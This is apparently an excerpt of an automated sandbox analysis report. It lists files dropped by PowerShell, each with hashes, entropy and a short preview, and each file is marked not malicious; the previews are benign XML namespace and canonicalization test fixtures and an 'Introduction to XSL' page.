                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:0IgNAWic4s1r62EJsHQCcHn0Xbc4sSJMzUnWboONEiIXwBuQRPG1tHcb:DglxWsHGH09e9Oiam4HHcb
                                                                                                                                                                                                                      MD5:B88B0463FC54E3DC46E3830C068FC790
                                                                                                                                                                                                                      SHA1:5AF2E55D16E9BE7F2F7B746D50498BFB80D81B1B
                                                                                                                                                                                                                      SHA-256:FA2B5A7672788A923C3AFFBE083AC5DB1300E0AA92785650C28C739C292D62C2
                                                                                                                                                                                                                      SHA-512:AD8C17FAAAE2EAEF159CDF75E3ECC60E386F4382C2F043030FF7B27172C69A50C08DF9D46F9D2C6D4CA80A8475FD590BB2C45312E5A9249DABEABDF8B3A01F88
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<a:foo xmlns:a="http://a">.. <a:bar xmlns:xsd="http://www.w3.org/2001/XMLSchema">xsd:string</a:bar>.. <dsig2:IncludedXPath xmlns:b="http://b" xmlns:dsig2="http://www.w3.org/2010/xmldsig2#" xmlns:soap-env="http://schemas.xmlsoap.org/wsdl/soap/">/soap-env:body/child::b:foo[@att1 != "c:val" and @att2 != 'xsd:string']</dsig2:IncludedXPath>..</a:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):74
                                                                                                                                                                                                                      Entropy (8bit):4.354044920410737
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:XuFZ88NAcH+3XoGMkqk+fEzn:aC8CcHI1Me+4n
                                                                                                                                                                                                                      MD5:553FAB5F1672810BC46CD9C1FA0259E9
                                                                                                                                                                                                                      SHA1:07330B063237D67497910CDE9F034D6C8151936A
                                                                                                                                                                                                                      SHA-256:189BC99E6399869072DCA427D38E0F951C5887EE6716AB933B898BDA4B07B147
                                                                                                                                                                                                                      SHA-512:236811C427E7CC7078D29778B4C361888604DFF6B5DEAB527646C166C58E41E881389110C166E8B975E2867413A457417A91756792C361A732B94F28324D80C0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<foo>.. <b:bar xmlns:b="http://b" att2="val" b:att1="val"></b:bar>..</foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):96
                                                                                                                                                                                                                      Entropy (8bit):4.457067386399957
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:3WKIFD7odbtAcH+3XoGPRzkyUfo9:mp/o3AcHI1PeyUY
                                                                                                                                                                                                                      MD5:7CD75B9F35E2AF5A72C268C7B80ED1F0
                                                                                                                                                                                                                      SHA1:01B362E61730F3D8BFB0A3EB9E67F86F6FE1DE3F
                                                                                                                                                                                                                      SHA-256:8B2BCD99132995A1009AE4DA025279D1C3DC56E34ECD412E8A2840F450728A6C
                                                                                                                                                                                                                      SHA-512:BC8A5A902318AD0985E6729B63FD12F33C84E01CC193B993092CC1C5F3D3F1945F41E4DA793A14C92644EFFAC155B9151D50B03C752B8BF71A84626672A3B20D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<n0:foo xmlns:n0="">.. <n1:bar xmlns:n1="http://b" att2="val" n1:att1="val"></n1:bar>..</n0:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):197
                                                                                                                                                                                                                      Entropy (8bit):4.259221532807288
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:0IgNAp8CcH9z8CcH9z8CcH9RtCcH9lmUb:DgHkk7zb
                                                                                                                                                                                                                      MD5:53D0EC7E5596CD42F58392D2873DB1D6
                                                                                                                                                                                                                      SHA1:F73F0E02F26175507448AB0817456A104D39BEEC
                                                                                                                                                                                                                      SHA-256:88ED2A2EDDFAA7BA730FF2E53F4D6B1A7107C6099AA48B2821039DBFF9D4DB0C
                                                                                                                                                                                                                      SHA-512:2ADF7099E10170B447037466D3886426D77B5D80D4423B1E440BCD0A73A75F2647F5B8E65D8F21D57C1F4AA7BF8CE0CF98D7FD83BAFCE317A04BFC85407762BA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<a:foo xmlns:a="http://a">.. <b:bar xmlns:b="http://b"></b:bar>.. <b:bar xmlns:b="http://b"></b:bar>.. <b:bar xmlns:b="http://b"></b:bar>.. <a:bar xmlns:b="http://b" b:att1="val"></a:bar>..</a:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):213
                                                                                                                                                                                                                      Entropy (8bit):4.3977746193749905
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:3WKIFDCfgtAcH9BfJ1tAcH9BfJ1tAcH9BfJ1HytAcHxTRzkyVw9:mpWGAcH9BNAcH9BNAcH9BIAcHxTeym
                                                                                                                                                                                                                      MD5:9D66BC045CADCEEC97BFD99032D3E9FD
                                                                                                                                                                                                                      SHA1:0B66F67234D16E4BF1EC9619202BE3DC2E7B7D02
                                                                                                                                                                                                                      SHA-256:5A094E2699415EB1FB6DE963F58E7EAFC2EB3BECAB3AD0F8E4D9D47A268C940F
                                                                                                                                                                                                                      SHA-512:EE8B560361C16B0C7FE55F1D23924246FBC21EE722929AAC32DF3F807A7DB367AA1A4FB28E05AFE20073BEACE212C71860FF2FBDCE3EBF566A8CFEE46FD4A58F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<n0:foo xmlns:n0="http://a">.. <n1:bar xmlns:n1="http://b"></n1:bar>.. <n1:bar xmlns:n1="http://b"></n1:bar>.. <n1:bar xmlns:n1="http://b"></n1:bar>.. <n0:bar xmlns:n1="http://b" n1:att1="val"></n0:bar>..</n0:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):182
                                                                                                                                                                                                                      Entropy (8bit):4.475129989287152
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:XIFgNAEWlSvNAEXGnqT0FjRyqRFek0DmEVHIFgNAEXS7NAEWl2lqPHsRxqT0b0Hg:igNAEguCEXGnHBkFVmEVHI2NAEXsCEgQ
                                                                                                                                                                                                                      MD5:C057404A45EA821D4218F00CE4903D08
                                                                                                                                                                                                                      SHA1:9F85493164CD3E33DDBE12AE5B8BE8C535881676
                                                                                                                                                                                                                      SHA-256:AA4C329EB9759B3E25A7BA5402573A8D10EA3E70ECD6A0827E3575104BEAC796
                                                                                                                                                                                                                      SHA-512:937E5C2E6C032FE4E5B3901FAB185DEB895659E2269E4A575F4C68D680A834390B45AC186AA223DCEBAB83744568539578D088905EB23D441C78B38345DE5E28
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<foo xmlns:a="http://z3" xmlns:b="http://z2" b:att2="val2" a:att1="val1"> .. <bar xmlns="http://z0" xmlns:a="http://z2" xmlns:b="http://z3" a:att1="val1" b:att2="val2"></bar>..</foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):175
                                                                                                                                                                                                                      Entropy (8bit):4.489719473537614
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:3WKIFDldLtAEXShRAEWlpeHT0FjshRFeDVXjmEVRUfERzPLXT0b0LWfHEXbr9:mphzAEX0mEgwoaIxTmEVRUfEmoLWcXbx
                                                                                                                                                                                                                      MD5:D70B36CA7DA958D65CAF333C0623F618
                                                                                                                                                                                                                      SHA1:0F51400470D27D9E011394417986FAF7D8A82EBD
                                                                                                                                                                                                                      SHA-256:F08CD410112ACA5616566775E50480911E7547B9D78C072F1E68F3898157446A
                                                                                                                                                                                                                      SHA-512:B9B6BCCD415730E3DFAA851C535A1463A49F5BE1E6DCEA14EFAEF7CB0961C18CE45D59951B3082B652AF9DA2A4472D53CA3DF97433A5A2122EECF2648EA49884
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<n0:foo xmlns:n0="" xmlns:n1="http://z2" xmlns:n2="http://z3" n1:att2="val2" n2:att1="val1"> .. <n3:bar xmlns:n3="http://z0" n1:att1="val1" n2:att2="val2"></n3:bar>..</n0:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):189
                                                                                                                                                                                                                      Entropy (8bit):4.59004645774251
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:0XKFgNAEWlSvNAEXSvEUcwZp4yqPHsRxqT0byjIHEL/sfHEVERziEVbfcfz8I3Nb:0IgNAEguCEXsENAqsxHujj/syERziEV4
                                                                                                                                                                                                                      MD5:F2972F110E842CDA3CCFF15E3F1C3524
                                                                                                                                                                                                                      SHA1:5DECDA99FB131CFB5BC1974FA395EE47E86F2C71
                                                                                                                                                                                                                      SHA-256:97FD76E6E4F5111F8BD245E5D09BB6CA36BA7967D5A7ED5EDA618059F0A0E1C4
                                                                                                                                                                                                                      SHA-512:DF5EF136A7344388441B715E6EDC0A17282D3046122EAE0DE75A31B7FBE4414B9290552725580FC745DCF7A62EF1DE1EE11FA35CF5198D68DFC8183BF05FC7F4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<a:foo xmlns:a="http://z3" xmlns:b="http://z2" xmlns:c="http://z1" c:att3="val3" b:att1="val1" b:att2="val2">.. <c:bar></c:bar>.. <c:bar xmlns:d="http://z0" d:att3="val3"></c:bar>..</a:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):203
                                                                                                                                                                                                                      Entropy (8bit):4.545820041594527
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:h4WEPUAEX0mEgJ4ZGnoujqmEVRWfno8Yn:h4NPak9gJ4ZGnjq9Vwfo8Y
                                                                                                                                                                                                                      MD5:267205D9AC86AFD36175C54C2665E78F
                                                                                                                                                                                                                      SHA1:D3C73B58F06740FE60A4E34AF1747EBBC5E294C5
                                                                                                                                                                                                                      SHA-256:03AB66D17650BD2A488682A1642C8E4D29656F6A24D12B71E1BD3112A3E9E118
                                                                                                                                                                                                                      SHA-512:AE27925464423084E3258DF591176BBE3A077B7F39E67CE11582DC3E2D00188BB3E3615B00BF7C0F8D87AAF03DA625C3038A1CE926F07785DE2671306F5D1366
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<n2:foo xmlns:n0="http://z1" xmlns:n1="http://z2" xmlns:n2="http://z3" n0:att3="val3" n1:att1="val1" n1:att2="val2">.. <n0:bar></n0:bar>.. <n0:bar xmlns:n3="http://z0" n3:att3="val3"></n0:bar>..</n2:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):190
                                                                                                                                                                                                                      Entropy (8bit):4.6245660664013295
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:XIFvDmEVHIFgNAEVHIF7NAEVewyqPHsRxqT0bSb6EV2EVcA8IDv+FdKRziEVdKpA:i7mEVHI2NAEVHItCEVSFxH+b92EVP8Ih
                                                                                                                                                                                                                      MD5:FB3F4678181A318A41ECE7902FB84674
                                                                                                                                                                                                                      SHA1:15B26F1FFC69A14379677448790F4A6881B28379
                                                                                                                                                                                                                      SHA-256:C719230DE5798E6DCC4123D6D5159E75DB0E167F5C01DE7BD1B9B6C4A59FB6EF
                                                                                                                                                                                                                      SHA-512:54B671A24F2032251CB3A5721AD77FC64FB908272448731C65FF5B25D420D6C914A0B0CFA0E51406C96545522259249980588E302ABE026EAF6E328CB5418A00
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<foo xmlns="http://z0" xmlns:a="http://z0" xmlns:b="http://z0" a:att1="val1" b:att2="val2"> .. <c:bar xmlns:c="http://z0" c:att3="val3"></c:bar>.. <d:bar xmlns:d="http://z0"></d:bar>..</foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):126
                                                                                                                                                                                                                      Entropy (8bit):4.438185782167466
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:3WKIFDCEVRVwzPL+YT0bSbJHf78b1HjG9:mpWEVR+m9+bJ78Q
                                                                                                                                                                                                                      MD5:EAA2C824E683603CFF9D10147CC6C618
                                                                                                                                                                                                                      SHA1:37E6473516B49F365B738B61A670817AA59AF4F1
                                                                                                                                                                                                                      SHA-256:43519F164D4A317F06FE01E852310B15E1B40992CB2F5F6FD9A53E8AF06941A5
                                                                                                                                                                                                                      SHA-512:11C4C14ADB8253234491ACA372DC6528DF2DD3218F6757081EE09DBF7E11E46B9D876AEA88955E68F2799D9BE32B92A2D419A7FA0DC326783E5DFE65BE139B9C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<n0:foo xmlns:n0="http://z0" n0:att1="val1" n0:att2="val2"> .. <n0:bar n0:att3="val3"></n0:bar>.. <n0:bar></n0:bar>..</n0:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):138
                                                                                                                                                                                                                      Entropy (8bit):5.057445971937572
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:XIFvDmEVHIRE7M9ViJS4RKbuviyiFdFcZW6B4E0keqn:i7mEVHIK7M9Vic4subinFW0keqn
                                                                                                                                                                                                                      MD5:52A267653753C4DA812D5535FAC28A82
                                                                                                                                                                                                                      SHA1:796D3D788F4279EC87593999E91864C2BCE25873
                                                                                                                                                                                                                      SHA-256:6BEFAE368D86F96D804EA69D1B2869DC67565B9004B61D77C802F3B5E7EAF154
                                                                                                                                                                                                                      SHA-512:F4B9FDD5FFB9D91132CCF4B067D184C94811C14CDD606D27E099D238E580A346BB8BA7F827A97CFF89E3FFE8D09216E47DAA6AD134C9D327D4FC107D59744104
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<foo xmlns="http://z0" xml:id="23">.. <bar xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xsd:string">data</bar>..</foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):151
                                                                                                                                                                                                                      Entropy (8bit):4.99604486325663
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:3WKIFDCEVHIRE7AVfHytAJS4RKbuviyiFLGRk99W6B4E0JI9:mpWEVHIK7ASAc4subixh9Z0q
                                                                                                                                                                                                                      MD5:20D28AC35089A9C62B8D459525A75B5C
                                                                                                                                                                                                                      SHA1:4A0360464615A1B69B8A71EE5A538DF805A0F9FF
                                                                                                                                                                                                                      SHA-256:B62335EB6AA94055063645131D0AE8B8CDA1127F88CADAC72CCDFB0D85150604
                                                                                                                                                                                                                      SHA-512:6C968956BA566A830486D04543B2C1F8059A5298711ACD662E93ADD671B943BA6823799D672EF0AAEDD85C438FF35C35CF2A2345D51655BA0F784B0F14D94C54
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<n0:foo xmlns:n0="http://z0" xml:id="23">.. <n0:bar xmlns:n1="http://www.w3.org/2001/XMLSchema-instance" n1:type="xsd:string">data</n0:bar>..</n0:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):194
                                                                                                                                                                                                                      Entropy (8bit):5.008280164746225
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:3WKIFDCEVHIRE7AVfHytAJS4RKbumd0tRAJS4RKbuviyiFLpcPUfW1B4E0JI9:mpWEVHIK7ASAc4sremc4subixyV0q
                                                                                                                                                                                                                      MD5:A94BC092915C410CC5E7E23F0D1A31FC
                                                                                                                                                                                                                      SHA1:F09AC72C5BA10696834594A788D0DF46EB1A9C72
                                                                                                                                                                                                                      SHA-256:1613F9DD89F267B2583EEDE1BBBE5E064DE1CF13AAEFD5432078CA3F53E3C5F6
                                                                                                                                                                                                                      SHA-512:544A9D3D5E8AB7B58D517CEF8B46AAAEDFF15E257516604A6804875A869D18BE47823191FC41A329F0793166EA773A3C6A816F2315162A63A8EC15C55845688C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<n0:foo xmlns:n0="http://z0" xml:id="23">.. <n0:bar xmlns:n1="http://www.w3.org/2001/XMLSchema" xmlns:n2="http://www.w3.org/2001/XMLSchema-instance" n2:type="n1:string">data</n0:bar>..</n0:foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):183
                                                                                                                                                                                                                      Entropy (8bit):5.0736917332457505
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:XIFvDmEVHIRE7MEtViJS4RKbumd0jViJS4RKbuviyiFdFcZW6B4E0keqn:i7mEVHIK7M2ic4sroVic4subinFW0keq
                                                                                                                                                                                                                      MD5:944D575EAE3D305AE68BDE2B798CF459
                                                                                                                                                                                                                      SHA1:F4F08BE85D6D69BEDCD79BAF58E93C87E2560F67
                                                                                                                                                                                                                      SHA-256:52A452E5D740F364D0362761685B7360F67B6B238E998139BF740ADFAD93FFC5
                                                                                                                                                                                                                      SHA-512:E3023F7701CA8472D98223CD2ABE5EF78D83E37F3FB3F508E66E45A3B2B5617B7BDC79767DCCB8B31672C9BB649263692441272205CB08AAE6243EA7F7831AA5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<foo xmlns="http://z0" xml:id="23">.. <bar xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xsd:string">data</bar>..</foo>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5
                                                                                                                                                                                                                      Entropy (8bit):2.321928094887362
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:JP:JP
                                                                                                                                                                                                                      MD5:7D793037A0760186574B0282F2F435E7
                                                                                                                                                                                                                      SHA1:7C211433F02071597741E6FF5A8EA34789ABBF43
                                                                                                                                                                                                                      SHA-256:486EA46224D1BB4FB680F34F7C9AD96A8F24EC88BE73EA8E5A6C65260E9CB8A7
                                                                                                                                                                                                                      SHA-512:11853DF40F4B2B919D3815F64792E58D08663767A494BCBB38C0B2389D9140BBB170281B4A847BE7757BDE12C9CD0054CE3652D0AD3A1A0C92BABB69798246EE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:world
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (335), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1036
                                                                                                                                                                                                                      Entropy (8bit):5.778356836676455
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:ufl7wSRG5YApug6IpqtJHtdfmOs6ms3+9wxieqtyOOWB:ud5GGApuglWHCT2+qjHU
                                                                                                                                                                                                                      MD5:0A29D8DCD65E084ACF70ECBB9635C56E
                                                                                                                                                                                                                      SHA1:14921CB1BE5AB34F9E74BED3ABE41C5ADE1C30F8
                                                                                                                                                                                                                      SHA-256:9152FC90D3C84314239B59356C452C7D88B88FE8FA96F2F123D25437728BB82E
                                                                                                                                                                                                                      SHA-512:460BEDEEA9B7864286A8D362A9D4D10ECBE92767033865590D49B7C42F080A74FC33097A0EB81157715F6D12BE1A4111CF42EA0B8CF04BE073B82FC6CD36A085
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<a b='01234567890123456.......................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:exported SGML document, ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):152
                                                                                                                                                                                                                      Entropy (8bit):4.273476860686932
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:B4E6XldyJGiWVEGLLeALjOApCIgRottABvFReAL9qZttABJFRnR5hC4aK:CNd7i3/uTpCIgRottAZFAu8ttAjFdR5H
                                                                                                                                                                                                                      MD5:3972BE4008C15F106F8AC035AFF8F6B9
                                                                                                                                                                                                                      SHA1:59C0521BBD340BA66C9BAD387F84066247C51B43
                                                                                                                                                                                                                      SHA-256:FD605526A1004B662620292C1D808ED696B5CC61D9C5748121FD108071239981
                                                                                                                                                                                                                      SHA-512:E10A8D6BC4D6270CF7DDD70ACAFA1DDC5E59CE923E69DB216ED206ED8D4DDEF405A55ACF1DB7D999793250908F2E15DBCC725E3338C0B8DE405AE5B905D1BD5E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?pi data?>. comment -->.<root xmlns='namespace'>. <element key='value'>text</element>. <element>text</element>tail. <empty-element/>.</root>.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:exported SGML document, ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):122
                                                                                                                                                                                                                      Entropy (8bit):4.041790614548583
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:j4Kdr/ZeALjOApCIgRottABvFReAL9qZttABJFRnR5hC4aK:1drAuTpCIgRottAZFAu8ttAjFdR544aK
                                                                                                                                                                                                                      MD5:F62363FF5B919DEF40CBD2B1D43C6A8F
                                                                                                                                                                                                                      SHA1:FE6286F07D241854F3BA8FBA83FEF2D42C30940D
                                                                                                                                                                                                                      SHA-256:24B3C8E971A76D61CBF6A1BC9F9806C2B8E651A3AAE2978C21A5654E98A3FF33
                                                                                                                                                                                                                      SHA-512:7E1D99A0C0D3026E685D6BBAEEDB82A7DF27CA36D3BD27D7A9FF345158DD356C0AA9C064DCD6DC775FF1FC49AB80A0337F57C21F860DBF0746208073DA1D69AB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: comment -->.<root>. <element key='value'>text</element>. <element>text</element>tail. <empty-element/>.</root>.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ISO-8859 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1388
                                                                                                                                                                                                                      Entropy (8bit):5.163646868967851
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:2dVjNNticKXL6744g3Dv4RE2CPW9iGJ9hIek77d0B7VO09F/NAYE62FZNmA:cVjNNticKXLoozv4RE2Ce9iGJfIekPdf
                                                                                                                                                                                                                      MD5:927262928556B59B17345E936D67C3F3
                                                                                                                                                                                                                      SHA1:41D6E1B342F91C65C6208A7760B8857A6F45C979
                                                                                                                                                                                                                      SHA-256:9E9D7525D14BF7361D0DBF63325537BDD019C67D7DC265431266C1C13877B1F6
                                                                                                                                                                                                                      SHA-512:048CD6472E7882952A1CCE0E35FD944D14DD72C6EFCDE12B55567D07D543C29A760BEA63680578F1BBAE157CA7E99230452B3D671045051092C8765C670DF860
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="iso-8859-1"?>.<HTML xmlns:pp="http://www.isogen.com/paul/post-processor">.<TITLE>Introduction to XSL</TITLE>.<H1>Introduction to XSL</H1>........<HR/>...<H2>Overview.</H2>...<UL>.....<LI>1.Intro</LI>...<LI>2.History</LI>...<LI>3.XSL Basics</LI>...<LI>Lunch</LI>...<LI>4.An XML Data Model</LI>...<LI>5.XSL Patterns</LI>...<LI>6.XSL Templates</LI>...<LI>7.XSL Formatting Model.</LI>....</UL>............<HR/>...<H2>Intro</H2>...<UL>.....<LI>Who am I?</LI>...<LI>Who are you?</LI>...<LI>Why are we here?.</LI>....</UL>............<HR/>...<H2>History: XML and SGML</H2>...<UL>.....<LI>XML is a subset of SGML.</LI>...<LI>SGML allows the separation of abstract content from formatting.</LI>...<LI>Also one of XML's primary virtues (in the doc publishing domain)..</LI>....</UL>............<HR/>...<H2>History: What are stylesheets?</H2>...<UL>.....<LI>Stylesheets specify the formatting of SGML/XML documents.</LI>...<LI>Stylesheets put the &quot;style&quot; back into docume
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ISO-8859 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1387
                                                                                                                                                                                                                      Entropy (8bit):5.134299346860253
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:2dVjatWNticKXL6744g3DvmtZRE2CPWmtYiGJ9hImtFk77G9B7VO0mtEdU8AYE6K:cVjaMNticKXLoozvmbRE2CemCiGJfImi
                                                                                                                                                                                                                      MD5:C1D02C1EDE7C0E602445B00DF7F05142
                                                                                                                                                                                                                      SHA1:121F547F4488405D321C095CDC8A36FAA7C3AE92
                                                                                                                                                                                                                      SHA-256:39DE99C00960B9356996859DFBC79B3EBEC6AA1D3E821A1B4BF1B80168E78B70
                                                                                                                                                                                                                      SHA-512:151DAD98573A6112CD83C8359349D77FC0EABB20D1F38B63B3FDC59F530B590E10BBBD09D1FDC523215FA7D58DB42AFC88B32A05F7606DF106EFDEC18A573C0F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="iso-8859-1"?>.<HTML xmlns:pp="http://www.isogen.com/paul/post-processor">.<TITLE>Introduction to XSL</TITLE>.<H1>Introduction to XSL</H1>........<HR></HR>...<H2>Overview.</H2>...<UL>.....<LI>1.Intro</LI>...<LI>2.History</LI>...<LI>3.XSL Basics</LI>...<LI>Lunch</LI>...<LI>4.An XML Data Model</LI>...<LI>5.XSL Patterns</LI>...<LI>6.XSL Templates</LI>...<LI>7.XSL Formatting Model.</LI>....</UL>............<HR></HR>...<H2>Intro</H2>...<UL>.....<LI>Who am I?</LI>...<LI>Who are you?</LI>...<LI>Why are we here?.</LI>....</UL>............<HR></HR>...<H2>History: XML and SGML</H2>...<UL>.....<LI>XML is a subset of SGML.</LI>...<LI>SGML allows the separation of abstract content from formatting.</LI>...<LI>Also one of XML's primary virtues (in the doc publishing domain)..</LI>....</UL>............<HR></HR>...<H2>History: What are stylesheets?</H2>...<UL>.....<LI>Stylesheets specify the formatting of SGML/XML documents.</LI>...<LI>Stylesheets put the "style" back into
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):520
                                                                                                                                                                                                                      Entropy (8bit):4.500085354998999
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:LHTJrHYzDFNuF0LsfTJQWdMoWj8jKAjQ/FAj3Gj347jdy:LzJrH+OKsL6b7I2ArTGTchy
